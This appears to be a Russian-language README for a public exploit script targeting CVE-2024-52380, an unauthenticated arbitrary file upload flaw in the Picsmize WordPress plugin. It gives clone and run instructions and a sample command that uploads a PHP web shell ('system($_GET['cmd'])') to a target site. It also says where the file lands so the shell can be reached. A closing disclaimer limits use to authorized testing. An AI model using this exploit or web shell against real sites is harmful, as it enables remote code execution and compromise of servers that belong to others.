
Плагин Picsmize для WordPress уязвим к произвольной загрузке файлов.
Плагин Picsmize для WordPress уязвим к произвольной загрузке файлов.
Этот скрипт эксплуатирует уязвимость (CVE-2024-52380) в плагине Picsmize для WordPress, позволяя неаутентифицированным злоумышленникам выполнять произвольную загрузку файлов. Эта уязвимость существует во всех версиях Picsmize вплоть до 1.0.0 включительно. Эксплуатация этой уязвимости может привести к удалённому выполнению кода на целевом сервере.
requests (pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
Скрипт предоставляет два аргумента командной строки для удобства использования:
-u / --url (обязательный):
-u http://example.com
-c / --content (необязательный):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress: Корневой каталог сайта WordPress.wp-content/uploads: Каталог по умолчанию для загрузки медиафайлов в WordPress.2025/01: Структура каталогов соответствует году (2025) и месяцу (январь) на основе конфигурации даты сервера.Этот скрипт предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.